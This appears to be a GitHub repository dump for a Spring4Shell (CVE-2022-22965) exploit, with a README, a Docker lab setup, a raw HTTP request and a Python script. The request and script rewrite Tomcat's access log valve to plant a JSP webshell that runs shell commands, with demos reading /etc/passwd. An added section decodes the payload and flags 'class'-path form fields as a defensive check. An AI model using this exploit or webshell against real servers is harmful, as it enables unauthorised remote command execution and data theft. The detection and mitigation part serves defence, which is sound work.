├── README.md
├── SpringFramework_CVE-2022-22965_RCE.py
└── images
    ├── README.md
    ├── image-20220401121101971.png
    └── image-20220401121158108.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SpringFramework_CVE-2022-22965_RCE
Spring Framework remote code execution vulnerability CVE-2022-22965 ("Spring4Shell"). Form data binding accepts property paths of the form `class.module.classLoader.*`, which reach the Tomcat web application class loader and, through `resources.context.parent.pipeline.first`, the first valve of the Host pipeline: the AccessLogValve. The request below reconfigures that valve so that one access log line is written as a JSP file under the web root. `class.module` is `Class.getModule()`, so this path only exists on JDK 9 and later, and the target must be a WAR deployed on Tomcat.
## Reproduction environment
```
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -d -p 8090:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
```
Writing the webshell

Note: during verification the shell can only be written once. The AccessLogValve keeps the file it first opened and only reopens it on rotation, so a second POST with a different `prefix` or `directory` does not create a new file.
### Exploit script
```
python SpringFramework_CVE-2022-22965_RCE.py http://target.com:8090 whoami
```
![whoami](/images/image-20220401121101971.png)
```
python SpringFramework_CVE-2022-22965_RCE.py http://target.com:8090 "cat /etc/passwd"
```
![passwd](/images/image-20220401121158108.png)
### Burp
The `c2`, `c1` and `suffix` headers carry `<%`, `Runtime` and `%>//`; the valve's `%{name}i` directive copies them into the log line, because a literal `%` inside the `pattern` value would itself be parsed as a log directive. `directory=webapps/ROOT`, `prefix=Shell` and `suffix=.jsp` make the log file `webapps/ROOT/Shell.jsp` (relative to the Tomcat base directory), and the empty `fileDateFormat` keeps the date stamp out of the file name. The URL-encoded body is 761 bytes, matching the `Content-Length` below.
```
POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```
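To see what the request above actually leaves on disk, and to have a check for it on the defensive side, here is an added example; it is not part of this repository. It decodes the form body, emulates the AccessLogValve's `%{name}i` header substitution (my own minimal re-implementation, not Tomcat's code; no other log directives are modelled), reconstructs the JSP that lands in `webapps/ROOT/Shell.jsp`, and flags any form parameter whose dotted path contains a `class` segment, the same shape as the `class.*`, `Class.*`, `*.class.*`, `*.Class.*` disallowed-fields mitigation Spring published for this CVE. `EXPLOIT_BODY` and `EXPLOIT_HEADERS` are copied from the README request; the benign body in `main` is constructed for the demonstration.

```python
import re
from urllib.parse import parse_qsl

# Copy of the POST body from the README request (URL-encoded, 761 bytes).
EXPLOIT_BODY = (
    'class.module.classLoader.resources.context.parent.pipeline.first.pattern='
    '%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20'
    'java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20'
    'int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20'
    'while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di'
    '&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
    '&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT'
    '&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell'
    '&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
)

# Request headers the README request sends; the valve reads them via %{c1}i, %{c2}i, %{suffix}i.
EXPLOIT_HEADERS = {'c1': 'Runtime', 'c2': '<%', 'suffix': '%>//'}

# Property path from the bound form object down to the Host's first pipeline valve.
VALVE_PREFIX = 'class.module.classLoader.resources.context.parent.pipeline.first.'


def bound_valve_properties(body):
    """Return {valve property: decoded value} for every parameter under VALVE_PREFIX."""
    props = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.startswith(VALVE_PREFIX):
            props[name[len(VALVE_PREFIX):]] = value
    return props


def render_log_line(pattern, headers):
    """Emulate only the %{name}i directive of Tomcat's AccessLogValve pattern:
    each occurrence is replaced by the named request header ('' if absent).
    Assumption for this example: no other directive appears in the pattern."""
    return re.sub(r'%\{([^}]+)\}i', lambda m: headers.get(m.group(1), ''), pattern)


def written_jsp(body, headers):
    """The text the valve writes for one request, i.e. the webshell source."""
    return render_log_line(bound_valve_properties(body).get('pattern', ''), headers)


def shell_path(props):
    """File name the valve opens: directory/prefix + dateStamp + suffix.
    With an empty fileDateFormat the date stamp is empty."""
    return '{}/{}{}{}'.format(props.get('directory', ''), props.get('prefix', ''),
                              props.get('fileDateFormat', ''), props.get('suffix', ''))


def is_class_binding_attempt(body):
    """Detection check: a parameter name with a 'class' path segment (any case) is an
    attempt to bind through Class/ClassLoader and should be rejected before binding."""
    for name, _ in parse_qsl(body, keep_blank_values=True):
        if any(segment.lower() == 'class' for segment in name.split('.')):
            return True
    return False


def main():
    props = bound_valve_properties(EXPLOIT_BODY)
    print('valve file:', shell_path(props))
    print('written JSP:', written_jsp(EXPLOIT_BODY, EXPLOIT_HEADERS))
    benign = 'name=alice&classroom=7'  # constructed ordinary form post
    for label, body in (('exploit', EXPLOIT_BODY), ('benign', benign)):
        print(label, 'flagged' if is_class_binding_attempt(body) else 'clean')


if __name__ == '__main__':
    main()
```

The rendered line is `<% if("S".equals(request.getParameter("Tomcat"))){ ... Runtime.getRuntime().exec(...) ... } %>//`, which is why the three fragments travel in headers: a literal `%` in the pattern value would be consumed as a directive. `is_class_binding_attempt` is a request-level check; the actual fix is upgrading Spring, with the disallowed-fields `@InitBinder` as the documented stopgap.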
--------------------------------------------------------------------------------
/SpringFramework_CVE-2022-22965_RCE.py:
--------------------------------------------------------------------------------
import sys

import requests
import urllib3

# Optional HTTP proxy (e.g. Burp) for inspecting the traffic; pass proxies=PROXIES
# to the requests calls below to use it. Not used by default.
PROXIES = {
    'http': 'http://192.168.1.117:8080'
}

UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'

# The JSP fragments '<%', 'Runtime' and '%>//' travel in headers and are pulled into
# the AccessLogValve pattern through %{c2}i, %{c1}i and %{suffix}i, because a literal
# '%' in the pattern value would be parsed as a log directive. Content-Length is left
# to requests, which computes it from the body (the original hardcoded 762 for a
# 761-byte body).
HEAD = {
    'User-Agent': UA,
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Connection': 'close',
    'suffix': '%>//',
    'c1': 'Runtime',
    'c2': '<%',
    'DNT': '1',
    'Content-Type': 'application/x-www-form-urlencoded',
}

# class.module.classLoader.resources.context.parent.pipeline.first is the Host's
# AccessLogValve. pattern = JSP body; directory/prefix/suffix = webapps/ROOT/Shell.jsp;
# empty fileDateFormat keeps the date stamp out of the file name.
DATA = 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='


def exploit(url, cmd):
    try:
        urllib3.disable_warnings()
        # 1. Reconfigure the valve; the access log line for this request becomes Shell.jsp.
        requests.post(url, headers=HEAD, data=DATA, verify=False)
        # 2. Confirm the file was written (this GET is logged through the valve as well).
        probe = requests.get(url + '/Shell.jsp', headers={'User-Agent': UA}, verify=False)
        if probe.status_code != 200:
            print('Shell.jsp not written (HTTP %d)' % probe.status_code)
            return
        # 3. Tomcat=S is the gate inside the JSP; cmd goes to Runtime.exec().
        out = requests.get(url + '/Shell.jsp', params={'Tomcat': 'S', 'cmd': cmd},
                           headers={'User-Agent': UA}, verify=False).text
        print(out[0:1000])
    except requests.exceptions.ConnectionError as e:
        print(e)


if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('usage: SpringFramework_CVE-2022-22965_RCE.py http://127.0.0.1:8090 whoami')
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

--------------------------------------------------------------------------------
/images/README.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/images/image-20220401121101971.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecNN/SpringFramework_CVE-2022-22965_RCE/708f4a7fdf39106ecc66a6af46562a75e5b70928/images/image-20220401121101971.png
--------------------------------------------------------------------------------
/images/image-20220401121158108.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecNN/SpringFramework_CVE-2022-22965_RCE/708f4a7fdf39106ecc66a6af46562a75e5b70928/images/image-20220401121158108.png
--------------------------------------------------------------------------------